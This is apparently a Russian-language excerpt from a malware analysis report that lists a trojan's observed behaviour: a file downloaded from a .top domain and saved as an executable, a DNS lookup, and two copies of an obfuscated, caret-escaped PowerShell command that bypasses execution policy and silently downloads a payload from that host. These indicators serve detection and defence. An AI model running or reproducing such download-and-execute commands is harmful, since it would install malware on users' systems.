Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^wE^rS^heLl^.^e^xE^ -E^XecUt^ioNp^Oli^cy ^byPas^S^ -n^o^PRO^fIle -winDo^w^St^Y^Le hIddEn (n^EW-^O^BJEc^T^ Sys^t^EM^.net^.Web^ClIEn^T).d^O^wNl^o^aD^fil^E('http://sutraponef.top/read.p...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "p^o^wE^rS^heLl^.^e^xE^ -E^XecUt^ioNp^Oli^cy ^byPas^S^ -n^o^PRO^fIle -winDo^w^St^Y^Le hIddEn (n^EW-^O^BJEc^T^ Sys^t^EM^.net^.Web^ClIEn^T).d^O^wNl^o^aD^fil^E('http://sutraponef.top/read.p...' (со скрытым окном)